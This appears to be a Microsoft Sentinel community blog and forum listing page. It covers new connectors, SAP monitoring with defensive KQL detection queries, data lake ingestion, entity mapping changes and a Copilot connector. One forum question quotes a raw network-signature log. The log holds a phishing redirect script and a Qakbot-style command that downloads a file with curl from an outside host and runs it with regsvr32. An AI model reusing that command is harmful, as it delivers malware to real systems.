microsoft sentinel
785 TopicsWhat’s new in Microsoft Sentinel: February 2026
February brings a set of new innovations to Sentinel that helps you work with security content across your SOC. This month’s updates focus on how security teams ingest, manage, and operationalize content, with new connectors, multi-tenant content distribution capabilities, and an enhanced UEBA Essentials solution to surface high‑risk behavior faster across cloud and identity environments. We’re also introducing new partner-built agentic experiences available through Microsoft Security Store, enabling customers to extend Sentinel with specialized expertise directly inside their existing workflows. Together, these innovations help SOC teams move faster, scale smarter, and unlock deeper security insight without added complexity. Expand your visibility and capabilities with Sentinel content Seamlessly onboard security data with growing out-of-the-box connectors (general availability) Sentinel continues to expand its connector ecosystem, making it easier for security teams to bring together data from across cloud, SaaS, and on-premises‑premises environments so nothing critical slips through the cracks. With broader coverage and faster onboarding, SOCs can unlock unified visibility, stronger analytics, and deeper context across their entire security stack. Customers can now use out-of-the-box connectors and solutions for: o Mimecast Audit Logs o CrowdStrike Falcon Endpoint Protection o Vectra XDR o Palo Alto Networks Cloud NGFW o SocPrime o Proofpoint on Demand (POD) Email Security o Pathlock o MongoDB o Contrast ADR For the full list of connectors, see our documentation. Share your input on what to prioritize next with our App Assure team. Microsoft 365 Copilot data connector (public preview) The Microsoft 365 Copilot connector brings Microsoft 365 Copilot audit logs and activity data into Sentinel, giving security teams visibility into how Microsoft 365 Copilot is being used across their organization. Once ingested, this data can power analytics rules, custom detections, workbooks, automation, and investigations, helping SOC teams quickly spot anomalies, misuse, and policy violations. Customers can also send this data to the Sentinel data lake for advanced scenarios, such as custom graphs and MCP integrations, while benefiting from lower cost ingestion and flexible retention. Learn more here. Transition your Sentinel connectors to the codeless connector framework (CCF) Microsoft is modernizing data connectors by shifting from Azure Function based connectors to the codeless connector framework (CCF). CCF enables partners, customers, and developers to build custom connectors that ingest data into Sentinel with a fully SaaS managed experience, built-in health monitoring, centralized credential management, and enhanced performance. We recommend that customers review their deployed connectors and move to the latest CCF versions to ensure uninterrupted data collection and continued access to the latest Sentinel capabilities. As part of Azure’s modernization of custom data collection, the legacy custom data collection API will be retired in September 2026. Centrally manage and distribute Sentinel content across multiple tenants (public preview) For partners and SOCs managing multiple Sentinel tenants, you can centrally manage and distribute Sentinel content across multiple tenants from the Microsoft Defender portal. With multi-tenant content distribution, you can replicate analytics rules, automation rules, workbooks, and alert tuning rules across tenants instead of rebuilding the same detections, automation, and dashboards in one environment at a time. This helps you onboard new tenants faster, reduce configuration drift, and maintain a consistent security baseline while still keeping local execution in each target tenant under centralized control. Learn more: New content types supported in multi-tenant content distribution Find high-risk anomalous behavior faster with an enhanced UEBA essentials solution (public preview) UEBA Essentials solution now helps SOC teams uncover high‑risk anomalous behavior faster across Azure, AWS, GCP, and Okta. With expanded multi-cloud anomaly detection and new queries powered by the anomalies table, analysts can quickly surface the riskiest activity, establish reliable behavioral baselines, and understand anomalies in context without chasing noisy or disconnected signals. UEBA Essentials aligns activity to MITRE ATT&CK, highlights complex malicious IP patterns, and builds a comprehensive anomaly profile for users in seconds, reducing investigation time while improving signal quality across identity and cloud environments. UEBA Essentials is available directly from the Sentinel content hub, with 30+ prebuilt UEBA queries ready to deploy. Behavior analytics can be enabled automatically from the connectors page as new data sources are added, making it easy to turn deeper insight into immediate action. For more information, see: UEBA Solution Power Boost: Practical Tools for Anomaly Detection Extend Sentinel with partner-built Security Copilot agents in Microsoft Security Store (general availability) You can extend Sentinel with partner-built Security Copilot agents that are discoverable and deployable through Microsoft Security Store in the Defender experience. These AI-powered agents are created by trusted partners specifically to work with Sentinel to deliver packaged expertise for investigation, triage, and response without requiring you to build your own agentic workflows from scratch. These partner-built agents work with Sentinel analytics and incidents to help SOC teams triage faster, investigate deeper, and surface insights that would otherwise take hours of manual effort. For example, these agents can review Sentinel and Defender environments, map attacker activity, or automate forensic analysis and SOC reporting. BlueVoyant’s Watchtower agent helps optimize Sentinel and Defender configurations, AdaQuest’s Data Leak agent accelerates response by surfacing risky data exposure and identity misuse, and Glueckkanja’s Attack Mapping agent automatically maps fragmented entities and attacker behavior into a coherent investigation story. Together, these agents show how the Security Store turns partner innovation into enterprise-ready, Security Copilot-powered capabilities that you can use in your existing SOC workflows. Browse these and more partner-built Security Copilot agents in the Security Store within the Defender portal. At Ignite, we announced the native integration of Security Store within the Defender portal. Read more about the GA announcement here: Microsoft Security Store: Now Generally Available Explore Sentinel experience Enhanced reports in the Threat Intelligence Briefing Agent (general availability) The Threat Intelligence Briefing Agent now applies a structured knowledge graph to Microsoft Defender for Threat Intelligence, enabling it to surface fresher, more relevant threats tailored to a customer’s specific industry and region. Building on this foundation, the agent also features embedded, high‑fidelity Microsoft Threat Intelligence citations, providing authoritative context directly within each insight. With these advancements, security teams gain clearer, more actionable guidance and mitigation steps through context‑rich insights aligned to their environment, helping them focus on what matters most and respond more confidently to emerging threats. Learn more: Microsoft Security Copilot Threat Intelligence Briefing Agent in Microsoft Defender Microsoft Purview Data Security Investigations (DSI) integrated with Sentinel graph (general availability) Sentinel now brings together data‑centric and threat‑centric insights to help teams understand risk faster and respond with more confidence. By combining AI‑powered deep content analysis from Microsoft Purview with activity‑centric graph analytics in Sentinel, security teams can identify sensitive or risky data, see how it was accessed, moved, or exposed, and take action from a single experience. This gives SOC and data security teams a full, contextual view of the potential blast radius, connecting what happened to the data with who accessed it and how, so investigations are faster, clearer, and more actionable. Start using the Microsoft Purview Data Security Investigations (DSI) integration with the Sentinel graph to give your analysts richer context and streamline end‑to‑end data risk investigations. Deadline to migrate the Sentinel experience from Azure to Defender extended to March 2027 To reduce friction and support customers of all sizes, we are extending the sunset date for managing Sentinel in the Azure portal to March 31, 2027. This additional time ensures customers can transition confidently while taking advantage of new capabilities that are becoming available in the Defender portal. Learn more about this decision, why you should start planning your move today, and find helpful resources here: UPDATE: New timeline for transitioning Sentinel experience to Defender portal Events and webinars Stay connected with the latest security innovations and best practices through global conferences and expert‑led sessions that bring the community together to learn, connect, and explore how Microsoft is delivering AI‑driven, end‑to‑end security for the modern enterprise. Join us at RSAC, March 23–26, 2026 at the Moscone Center in San Francisco Register for RSAC and stop by the Microsoft booth to see our latest security innovations in action. Learn how Sentinel SIEM and platform help organizations stay ahead of threats, simplify operations, and protect what matters most. Register today! Microsoft Security Webinars Discover upcoming sessions on Sentinel SIEM & platform, Defender, and more. Sign up today and be part of the conversation that shapes security for everyone. Learn more about upcoming webinars. Additional resources Blogs: UPDATE: New timeline for transitioning Sentinel experience to Defender portal, Accelerate your move to Microsoft Sentinel with AI-powered SIEM migration tool, Automating Microsoft Sentinel: A blog series on enabling Smart Security, The Agentic SOC Era: How Sentinel MCP Enables Autonomous Security Reasoning Documentation: What Is a Security Graph? , SIEM migration tool, Onboarding to Microsoft Sentinel data lake from the Defender portal Stay connected Check back each month for the latest innovations, updates, and events to ensure you’re getting the most out of Sentinel. We’ll see you in the next edition!709Views2likes1CommentSAP & Business-Critical App Security Connectors
I validated what it takes to make SAP and SAP-adjacent security signals operational in a SOC: reliable ingestion, stable schemas, and detections that survive latency and schema drift. I focus on four integrations into Microsoft Sentinel: SAP Enterprise Threat Detection (ETD) cloud edition (SAPETDAlerts_CL, SAPETDInvestigations_CL), SAP S/4HANA Cloud Public Edition agentless audit ingestion (ABAPAuditLog), Onapsis Defend (Onapsis_Defend_CL), and SecurityBridge (also ABAPAuditLog). Because vendor API specifics for ETD Retrieval API / Audit Retrieval API aren’t publicly detailed in the accessible primary sources I could retrieve, I explicitly label pagination/rate/time-window behaviors as unspecified where appropriate. Connector architectures and deployment patterns For SAP-centric telemetry I separate two planes: First is SAP application telemetry that lands in SAP-native tables, especially ABAPAuditLog, ABAPChangeDocsLog, ABAPUserDetails, and ABAPAuthorizationDetails. These tables are the foundation for ABAP-layer monitoring and are documented with typed columns in Azure Monitor Logs reference. Second is external “security product” telemetry (ETD alerts, Onapsis findings). These land in custom tables (*_CL) and typically require a SOC-owned normalization layer to avoid brittle detections. Within Microsoft’s SAP solution itself, there are two deployment models: agentless and containerized connector agent. The agentless connector uses SAP Cloud Connector and SAP Integration Suite to pull logs, and Microsoft documents it as the recommended approach; the containerized agent is being deprecated and disabled on September 14, 2026. On the “implementation technology” axis, Sentinel integrations generally show up as: - Codeless Connector Framework (CCF) pollers/pushers (SaaS-managed ingestion definitions with DCR support). - Function/Logic App custom pipelines using the Logs Ingestion API when you need custom polling, enrichment, or a vendor endpoint that isn’t modeled in CCF. In my view, ETD and S/4HANA Cloud connectors are “agentless” from the Sentinel side (API credentials only), while Onapsis Defend and SecurityBridge connectors behave like push pipelines because Microsoft requires an Entra app + DCR permissions (typical Logs Ingestion API pattern). Authentication and secrets handling Microsoft documents the required credentials per connector: - ETD cloud connector requires Client Id + Client Secret for ETD Retrieval API (token mechanics unspecified). - S/4HANA Cloud Public Edition connector requires Client Id + Client Secret for Audit Retrieval API (token mechanics unspecified), and Microsoft notes “alternative authentication mechanisms” exist (details in linked repo are unspecified in accessible sources). - Onapsis Defend and SecurityBridge connectors require a Microsoft Entra ID app registration and Azure permission to assign Monitoring Metrics Publisher on DCRs. This maps directly to the Logs Ingestion API guidance, where a service principal is granted DCR access via that role (or the Microsoft.Insights/Telemetry/Write data action). For production, I treat these as “SOC platform secrets”: - Store client secrets/certificates in Key Vault when you own the pipeline (Function/Logic App); rotate on an operational schedule; alert on auth failures and sudden ingestion drops. - For vendor-managed ingestion (Onapsis/SecurityBridge), I still require: documented ownership of the Entra app, explicit RBAC scope for the DCR, and change control for credential rotation because a rotated secret is effectively a data outage. API behaviors and ingestion reliability For ETD Retrieval API and Audit Retrieval API, pagination/rate limits/time windows are unspecified in the accessible vendor documentation I could retrieve. I therefore design ingestion and detections assuming non-ideal API behavior: late-arriving events, cursor/page limitations, and throttling. CCF’s RestApiPoller model supports explicit retry policy, windowing, and multiple paging strategies, so if/when you can obtain vendor API semantics, you can encode them declaratively (rather than writing fragile code). For the SAP solution’s telemetry plane, Microsoft provides strong operational cues: agentless collection flows through Integration Suite, and troubleshooting typically happens in the Integration Suite message log; this is where I validate delivery failures before debugging Sentinel-side parsers. For scheduled detections, I always account for ingestion delay explicitly. Microsoft’s guidance is to widen event lookback by expected delay and then constrain on ingestion_time() to prevent duplicates from overlap. Schema, DCR transformations, and normalization layer Connector attribute comparison Connector Auth method Sentinel tables Default polling Backfill Pagination Rate limits SAP ETD (cloud) Client ID + Secret (ETD Retrieval API) SAPETDAlerts_CL, SAPETDInvestigations_CL unspecified unspecified unspecified unspecified SAP S/4HANA Cloud (agentless) Client ID + Secret (Audit Retrieval API); alt auth referenced ABAPAuditLog unspecified unspecified unspecified unspecified Onapsis Defend Entra app + DCR permission (Monitoring Metrics Publisher) Onapsis_Defend_CL n/a (push pattern) unspecified n/a unspecified SecurityBridge Entra app + DCR permission (Monitoring Metrics Publisher) ABAPAuditLog n/a (push pattern) unspecified n/a unspecified Ingestion-time DCR transformations Sentinel supports ingestion-time transformations through DCRs to filter, enrich, and mask data before it’s stored. Example: I remove low-signal audit noise and mask email identifiers in ABAPAuditLog: source | where isnotempty(TransactionCode) and isnotempty(User) | where TransactionCode !in ("SM21","ST22") // example noise; tune per tenant | extend Email = iif(Email has "@", strcat(substring(Email,0,2),"***@", tostring(split(Email,"@")[1])), Email) Normalization functions Microsoft explicitly recommends using SAP solution functions instead of raw tables because they can change the infrastructure beneath without breaking detections. I follow the same pattern for ETD/Onapsis custom tables: I publish SOC-owned functions as a schema contract. .create-or-alter function with (folder="SOC/SAP") Normalize_ABAPAudit() { ABAPAuditLog | project TimeGenerated, SystemId, ClientId, User, TransactionCode, TerminalIpV6, MessageId, MessageClass, MessageText, AlertSeverityText, UpdatedOn } .create-or-alter function with (folder="SOC/SAP") Normalize_ETDAlerts() { SAPETDAlerts_CL | extend AlertId = tostring(coalesce(column_ifexists("AlertId",""), column_ifexists("id",""))), Severity = tostring(coalesce(column_ifexists("Severity",""), column_ifexists("severity",""))), SapUser = tostring(coalesce(column_ifexists("SAP_User",""), column_ifexists("User",""), column_ifexists("user",""))) | project TimeGenerated, AlertId, Severity, SapUser, * } .create-or-alter function with (folder="SOC/SAP") Normalize_Onapsis() { Onapsis_Defend_CL | extend FindingId = tostring(coalesce(column_ifexists("FindingId",""), column_ifexists("id",""))), Severity = tostring(coalesce(column_ifexists("Severity",""), column_ifexists("severity",""))), SapUser = tostring(coalesce(column_ifexists("SAP_User",""), column_ifexists("user",""))) | project TimeGenerated, FindingId, Severity, SapUser, * } Health/lag monitoring and anti-gap I monitor both connector health and ingestion delay. SentinelHealth is the native health table, and Microsoft provides a health workbook and a schema reference for the fields. let lookback=24h; union isfuzzy=true (ABAPAuditLog | extend T="ABAPAuditLog"), (SAPETDAlerts_CL | extend T="SAPETDAlerts_CL"), (Onapsis_Defend_CL | extend T="Onapsis_Defend_CL") | where TimeGenerated > ago(lookback) | summarize LastEvent=max(TimeGenerated), P95DelaySec=percentile(datetime_diff("second", ingestion_time(), TimeGenerated), 95), Events=count() by T Anti-gap scheduled-rule frame (Microsoft pattern): let ingestion_delay=10m; let rule_lookback=5m; ABAPAuditLog | where TimeGenerated >= ago(ingestion_delay + rule_lookback) | where ingestion_time() > ago(rule_lookback) SOC detections for ABAP privilege abuse, fraud/insider behavior, and audit readiness Privileged ABAP transaction monitoring ABAPAuditLog includes TransactionCode, User, SystemId, and terminal/IP fields, so I start with a curated high-risk tcode set and then add baselines. let PrivTCodes=dynamic(["SU01","PFCG","SM59","RZ10","SM49","SE37","SE16","SE16N"]); Normalize_ABAPAudit() | where TransactionCode in (PrivTCodes) | summarize Actions=count(), Ips=make_set(TerminalIpV6,5) by SystemId, User, TransactionCode, bin(TimeGenerated, 1h) | where Actions >= 3 Fraud/insider scenario: sensitive object change near privileged audit activity ABAPChangeDocsLog exposes ObjectClass, ObjectId, and change types; I correlate sensitive object changes to privileged transactions in a tight window. let w=10m; let Sensitive=dynamic(["BELEG","BPAR","PFCG","IDENTITY"]); ABAPChangeDocsLog | where ObjectClass in (Sensitive) | project ChangeTime=TimeGenerated, SystemId, User=tostring(column_ifexists("User","")), ObjectClass, ObjectId, TypeOfChange=tostring(column_ifexists("ItemTypeOfChange","")) | join kind=innerunique ( Normalize_ABAPAudit() | project AuditTime=TimeGenerated, SystemId, User, TransactionCode ) on SystemId, User | where AuditTime between (ChangeTime-w .. ChangeTime+w) | project ChangeTime, AuditTime, SystemId, User, ObjectClass, ObjectId, TransactionCode, TypeOfChange Audit-ready pipeline: monitoring continuity and configuration touchpoints I treat audit logging itself as a monitored control. A simple SOC-safe control is “volume drop” by system; it’s vendor-agnostic and catches pipeline breaks and deliberate suppression. Normalize_ABAPAudit() | summarize PerHour=count() by SystemId, bin(TimeGenerated, 1h) | summarize Avg=avg(PerHour), Latest=arg_max(TimeGenerated, PerHour) by SystemId | where Latest_PerHour < (Avg * 0.2) Where Onapsis/ETD are present, I increase fidelity by requiring “privileged ABAP activity” plus an external SAP-security product finding (field mappings are tenant-specific; normalize first): let win=1h; Normalize_ABAPAudit() | where TransactionCode in ("SU01","PFCG","SM59","SE16N") | join kind=leftouter (Normalize_Onapsis()) on $left.User == $right.SapUser | where isempty(FindingId) == false and TimeGenerated1 between (TimeGenerated .. TimeGenerated+win) | project TimeGenerated, SystemId, User, TransactionCode, FindingId, OnapsisSeverity=Severity Production validation, troubleshooting, and runbook For acceptance, I validate in this order: table creation, freshness/lag percentiles, connector health state, and cross-check of event counts against the upstream system for the same UTC window (where available). Connector health monitoring is built around SentinelHealth plus the Data collection health workbook. For SAP agentless ingestion, Microsoft states most troubleshooting happens in Integration Suite message logs—this is where I triage authentication/networking failures before tuning KQL. For Onapsis/SecurityBridge-style ingestion, I validate Entra app auth, DCR permission assignment (Monitoring Metrics Publisher), and a minimal ingestion test payload using the Logs Ingestion API tutorial flow. Operational runbook items I treat as non-optional: health alerts on connector failure and freshness drift; scheduled rule anti-gap logic; playbooks that capture evidence bundles (ABAPAuditLog slice + user context from ABAPUserDetails/ABAPAuthorizationDetails); DCR filters to reduce noise and cost; and change control for normalization functions and watchlists. SOC “definition of done” checklist (short): 1) Tables present and steadily ingesting; 2) P95 ingestion delay measured and rules use the anti-gap pattern; 3) SentinelHealth enabled with alerts; 4) SOC-owned normalization functions deployed; 5) at least one privileged-tcode rule + one change-correlation rule + one audit-continuity rule in production. Mermaid ingestion flow:33Views1like0CommentsData lake tier Ingestion for Microsoft Defender Advanced Hunting Tables is Now Generally Available
Today, we’re excited to announce the general availability (GA) of data lake tier ingestion for Microsoft XDR Advanced Hunting tables into Microsoft Sentinel data lake. Security teams continue to generate unprecedented volumes of high‑fidelity telemetry across endpoints, identities, cloud apps, and email. While this data is essential for detection, investigation, and threat hunting, it also creates new challenges around scale, cost, and long‑term retention. With this release, users can now ingest Advanced Hunting data from: Microsoft Defender for Endpoint (MDE) Microsoft Defender for Office 365 (MDO) Microsoft Defender for Cloud Apps (MDA) directly into Sentinel data lake, without requiring ingestion into the Microsoft Sentinel Analytics tier. Support for Microsoft Defender for Identity (MDI) Advanced Hunting tables will follow in the near future. Supported Tables This release enables data lake tier ingestion for Advanced Hunting data from: Defender for Endpoint (MDE) – DeviceInfo, DeviceNetworkInfo, DeviceProcessEvents, DeviceNetworkEvents, DeviceFileEvents, DeviceRegistryEvents, DeviceLogonEvents, DeviceImageLoadEvents, DeviceEvents, DeviceFileCertificateInfo Defender for Office 365 (MDO) – EmailAttachmentInfo, EmailEvents, EmailPostDeliveryEvents, EmailUrlInfo, UrlClickEvents Defender for Cloud Apps (MDA) – CloudAppEvents Each source is ingested natively into Sentinel data lake, aligning with Microsoft’s broader lake‑centric security data strategy. As mentioned above, Microsoft Defender for Identity will be available in the near future. What’s New with data lake Tier Ingestion Until now, Advanced Hunting data was primarily optimized for near‑real‑time security operations and analytics. As users extend their detection strategies to include longer retention, retrospective analysis, AI‑driven investigations, and cross‑domain correlation, the need for a lake‑first architecture becomes critical. With data lake tier ingestion, Sentinel data lake becomes a must-have destination for XDR insights, enabling users to: Store high‑volume Defender Advanced Hunting data efficiently at scale while reducing operation overhead Extend security analytics and data beyond traditional analytics lifespans for investigation, compliance, and threat research with up to 12 years of retention Query data using KQL‑based experiences across unified datasets with the KQL explorer, KQL Jobs, and Notebook Jobs Integrate data with AI-driven tooling via MCP Server for quick and interactive insights into the environment Visualize threat landscapes and relational mappings while threat hunting with custom Sentinel graphs Decouple storage and retention decisions from real‑time SIEM operations while building a more flexible and futureproof Sentinel architecture Enabling Sentinel data lake Tier Ingestion for Advanced Hunting Tables The ingestion pipeline for sending Defender Advanced Hunting data to Sentinel data lake leverages existing infrastructure and UI experiences. To enable Advanced Hunting tables for Sentinel data lake ingestion: Within the Defender Portal, expand the Microsoft Sentinel section in the left navigation. Go to Configuration > Tables. Find any of the listed tables from above and select one. Within the side menu that opens, select Data Retention Settings. Once the options open, select the button next to ‘Data lake tier’ to set the table to ingest directly into Sentinel data lake. Set the desired total retention for the data. Click save. This configuration will allow Defender data to reside within each Advanced Hunting table for 30 days while remaining accessible via custom detections and queries, while a copy of the logs is sent to Sentinel data lake for usage with custom graphs, MCP server, and benefit from the option of retention up to 12 years. Why data lake Tier Ingestion Matters Built for Scale and Cost Efficiency Advanced Hunting data is rich—and voluminous. Sentinel data lake enables users to store this data using a lake‑optimized model, designed for high‑volume ingestion and long‑term analytical workloads while making it easy to manage table tiers and usage. A Foundation for Advanced Analytics With Defender data co‑located alongside other security and cloud signals, users can unlock: Cross‑domain investigations across endpoint, identity, cloud, and email Retrospective hunting without re‑ingestion AI‑assisted analytics and large‑scale pattern detection Flexible Architecture for Modern Security Teams Data lake tier ingestion supports a layered security architecture, where: Workspaces remain optimized for real‑time detection and SOC workflows The data lake serves as the cost-effective and durable system for security telemetry Users can choose the right level of ingestion depending on operational needs, without duplicating data paths or cost. Designed to Work with Existing Sentinel and XDR Experiences This GA release builds on Microsoft Sentinel’s ongoing investment in unified data configuration and management: Native integration with Microsoft Defender XDR Advanced Hunting schemas Alignment with existing Sentinel data lake query and exploration experiences Consistent management alongside other first‑party and third‑party data sources Consistent experiences within the Defender Portal No changes are required to existing Defender deployments to begin using data lake tier ingestion. Get started To learn more about Microsoft Sentinel Data Lake and managing Defender XDR data within Sentinel, visit the Microsoft Sentinel documentation and explore how lake‑based analytics can complement your existing security operations. We look forward to seeing how users use this capability to explore new detection strategies, perform deeper investigations, and build long‑term security habits.1.7KViews2likes0CommentsUpdate: Changing the Account Name Entity Mapping in Microsoft Sentinel
The upcoming update introduces more consistent and predictable entity data across analytics, incidents, and automation by standardizing how the Account Name property is populated when using UPN‑based mappings in analytic rules. Going forward, Account Name property will consistently contain only the UPN prefix, with new dedicated fields added for the full UPN and UPN suffix. While this improves consistency and enables more granular automation, customers who rely on specific Account Name values in automation rules or Logic App playbooks may need to take action. Timeline Effective date: July 1, 2026. The change will apply automatically - no opt-in is required. Scope of impact Analytics Rules which include mapping of User Principal Name (UPN) to the Account Name entity field, where the resulting alerts are processed by Automation Rules or Logic App Playbooks that reference the AccountName property. What’s changing Currently When an Analytic Rule includes mapping of a full UPN (for example: 'user@domain.com') to the Account Name field, the resulting input value for the Automation Rule or/and Logic App Playbook is inconsistent. In some cases, it contains only the UPN prefix: 'user', and in other cases the full UPN ('user@domain.com'). After July 1, 2026 Account Name property will consistently contain only the UPN prefix The following new fields will be added to the entity object: AccountName (UPN prefix) UPNSuffix UserPrincipalName (full UPN) This change provides an enhanced filtering and automation logic based on these new fields. Example Before Analytics Rule maps: 'user@domain.com' Automation Rule receives: Account Name: 'user' or 'user@domain.com' (inconsistent) After Analytics Rule maps: 'user@domain.com' Automation Rule receives: Account Name: 'user' UPNSuffix: 'domain.com' Logic App Playbook and SecurityAlert table receives: AccountName: 'user' UPNSuffix: 'domain.com' UserPrincipalName: 'user@domain.com' Feature / Location Before After SecurityAlert table Logic App Playbook Entity Why does it matter? If your automation logic relies on exact string comparisons against the full UPN stored in Account Name, those conditions may no longer match after the update. This most commonly affects: Automation Rules using "Equals" condition on Account Name Logic App Playbooks comparing entity field 'accountName' to a full UPN value Call to action Avoid strict equality checks against Account Name Use flexible operators such as: Contains Starts with Leverage the new UPNSuffix field for clearer intent Example update Before - Account name will show as 'user' or 'user@domain.com' After - Account Name will show as 'user' Recommended changes: Account Name Contains/Startswith 'user' UPNSuffix Equals/Startswith/Contains 'domain.com' This approach ensures compatibility both before and after the change takes effect. Where to update Review any filters, conditions, or branching logic that depend on Account Name values. Automation Rules: Use the 'Account name' field Logic App Playbooks: Update conditions referencing the entity: 'accountName' For example: Automation Rule before the change: Automation Rule after the change: Summary A consistency improvement to Account Name mapping is coming on July 1, 2026 The change affects Automation Rules and Logic App Playbooks that rely on UPN to Account Name mappings New UPN related fields provide better structure and control Customers should follow the recommendations above before the effective change date410Views0likes0CommentsThe Microsoft Copilot Data Connector for Microsoft Sentinel is Now in Public Preview
We are happy to announce a new data connector that is available to the public: the Microsoft Copilot data connector for Microsoft Sentinel. The new Microsoft Copilot data connector will allow for audit logs and activities generated by different offerings of Copilot to be ingested into Microsoft Sentinel and Microsoft Sentinel data lake. This allows for Copilot activities to be leveraged within Microsoft Sentinel features such as analytic rules/custom detections, Workbooks, automation, and more. This also allows for Copilot data to be sent to Sentinel data lake, which opens the possibilities for integrations with custom graphs, MCP server, and more while offering lower cost ingestion and longer retention as needed. Eligibility for the Connector The connector is available for all customers within Microsoft Sentinel, but will only ingest data for environments that have access to Copilot licenses and SCUs as the activities rely on Copilot being used. These logs are available via the Purview Unified Audit Log (UAL) feed, which is available and enabled for all users by default. A big value of this new connector is that it eliminates the need for users to go to the Purview Portal in order to see these activities, as they are proactively brought into the workspace, enabling SOCs to generate detections and proactively threat hunt on this information. Note: This data connector is a single-tenant connector, meaning that it will ingest the data for the entire tenant that it resides in. This connector is not designed to handle multi-tenant configurations. What’s Included in the Connector The following are record types from Office 365 Management API that will be supported as part of this connector: 261 CopilotInteraction 310 CreateCopilotPlugin 311 UpdateCopilotPlugin 312 DeleteCopilotPlugin 313 EnableCopilotPlugin 314 DisableCopilotPlugin 315 CreateCopilotWorkspace 316 UpdateCopilotWorkspace 317 DeleteCopilotWorkspace 318 EnableCopilotWorkspace 319 DisableCopilotWorkspace 320 CreateCopilotPromptBook 321 UpdateCopilotPromptBook 322 DeleteCopilotPromptBook 323 EnableCopilotPromptBook 324 DisableCopilotPromptBook 325 UpdateCopilotSettings 334 TeamCopilotInteraction 363 Microsoft365CopilotScheduledPrompt 371 OutlookCopilotAutomation 389 CopilotForSecurityTrigger 390 CopilotAgentManagement These are great options for monitoring users who have permission to make changes to Copilot across the environment. This data can assist with identifying if there are anomalous interactions taking place between users and Copilot, unauthorized attempts of access, or malicious prompt usage. How to Deploy the Connector The connector is available via the Microsoft Sentinel Content Hub and can be installed today. To find the connector: Within the Defender Portal, expand the Microsoft Sentinel navigation in the left menu. Expand Configuration and select Content Hub. Within the search bar, search for “Copilot”. Click on the solution that appears and click Install. Once the solution is installed, the connector can be configured by clicking on the connector within the solution and selecting Open Connector Page. To enable the connector, the user will need either Global Administrator or Security Administrator on the tenant. Once the connector is enabled, the data will be sent to the table named CopilotActivity. Note: Data ingestion costs apply when using this data connector. Pricing will be based on the settings for the Microsoft Sentinel workspace or at the Microsoft Sentinel data lake tier pricing. As this data connector is in Public Preview, users can start deploying this connector right now! As always, let us know what you think in the comments so that we may continue to build what is most valuable to you. We hope that this new data connector continues to assist your SOC with high valuable insights that best empowers your security. Resources: Office Management API Event Number List: https://learn.microsoft.com/en-us/office/office-365-management-api/office-365-management-activity-api-schema#auditlogrecordtype Purview Unified Audit Log Library: Audit log activities | Microsoft Learn Copilot Inclusion in the Microsoft E5 Subscription: Learn about Security Copilot inclusion in Microsoft 365 E5 subscription | Microsoft Learn Microsoft Sentinel: What is Microsoft Sentinel SIEM? | Microsoft Learn Microsoft Sentinel Platform: Microsoft Sentinel data lake overview - Microsoft Security | Microsoft Learn4.1KViews0likes1CommentNetworkSignatureInspected
Hi, Whilst looking into something, I was thrown off by a line in a device timeline export, with ActionType of NetworkSignatureInspected, and the content. I've read this article, so understand the basics of the function: Enrich your advanced hunting experience using network layer signals from Zeek I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour as I see the same data from different devices. Can anyone provide any clarity on the contents of AdditionalFields, where the ActionType is NetworkSignatureInspected, references for example CVE-2021-44228: ${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA<title>redirecting...</title><script>window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&&curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&&echo"fd"&®svr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl>J<scripttype="text/javascript">window.location="https:// Defender reports no issues on the device and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced. Any assistance with rationalising this would be great, thanks.197Views0likes2CommentsObserved Automation Discrepancies
Hi Team ... I want to know the logic behind the Defender XDR Automation Engine . How it works ? I have observed Defender XDR Automation Engine Behavior contrary to expectations of identical incident and automation handling in both environments, discrepancies were observed. Specifically, incidents with high-severity alerts were automatically closed by Defender XDR's automation engine before reaching their SOC for review, raising concerns among clients and colleagues. Automation rules are clearly logged in the activity log, whereas actions performed by Microsoft Defender XDR are less transparent . A high-severity alert related to a phishing incident was closed by Defender XDR's automation, resulting in the associated incident being closed and removed from SOC review. Wherein the automation was not triggered by our own rules, but by Microsoft's Defender XDR, and sought clarification on the underlying logic.22Views1like1CommentMicrosoft Sentinel for SAP Agentless connector GA
Dear Community, Today is the day: Our new agentless connector for Microsoft Sentinel Solution for SAP applications is Generally Available now! Fully onboarded to SAP’s official Business Accelerator Hub and ready for prime time wherever your SAP systems are waiting – on-premises, hyperscalers, RISE, or GROW – to be protected. Let’s hear from an agentless customer: “With the Microsoft Sentinel Solution for SAP and its new agentless connector, we accelerated deployment across our SAP landscape without the complexity of containerized agents. This streamlined approach elevated our SOC’s visibility into SAP security events, strengthened our compliance posture, and enabled faster, more informed incident response” SOC Specialist, North American aviation company Use the video below to kick off your own agentless deployment today. #Kudos to the amazing mvigilante for showing us around the new connector! But we didn’t stop there! Security is being reengineered for the AI era - moving from static, rule-based controls to platform-driven, machine-speed defence that anticipates threats before they strike. Attackers think in graphs - Microsoft does too. We’re bringing relationship-aware context to Microsoft Security - so defenders and AI can see connections, understand the impact of a potential compromise (blast radius), and act faster across pre-breach and post-breach scenarios including SAP systems - your crown jewels. See it in action in below phishing-compromise which lead to an SAP login bypassing MFA with followed operating-system activities on the SAP host downloading trojan software. Enjoy this clickable experience for more details on the scenario. Shows how a phishing compromise escalated to an SAP MFA bypass, highlighting cross-domain correlation. The Sentinel Solution for SAP has AI-first in mind and directly integrates with our security platform on the Defender portal for enterprise-wide signal correlation, Security Copilot reasoning, and Sentinel Data Lake usage. Your real-time SAP detections operate on the Analytics tier for instant results and threat hunting, while the same SAP logs get mirrored to the lake for cost-efficient long-term storage (up to 12 years). Access that data for compliance reporting or historic analysis through KQL jobs on the lake. No more – yeah, I have the data stored somewhere to tick the audit report check box – but be able to query and use your SAP telemetry in long term storage at scale. Learn more here. Findings from the Agentless Connector preview During our preview we learned that majority of customers immediately profit from the far smoother onboarding 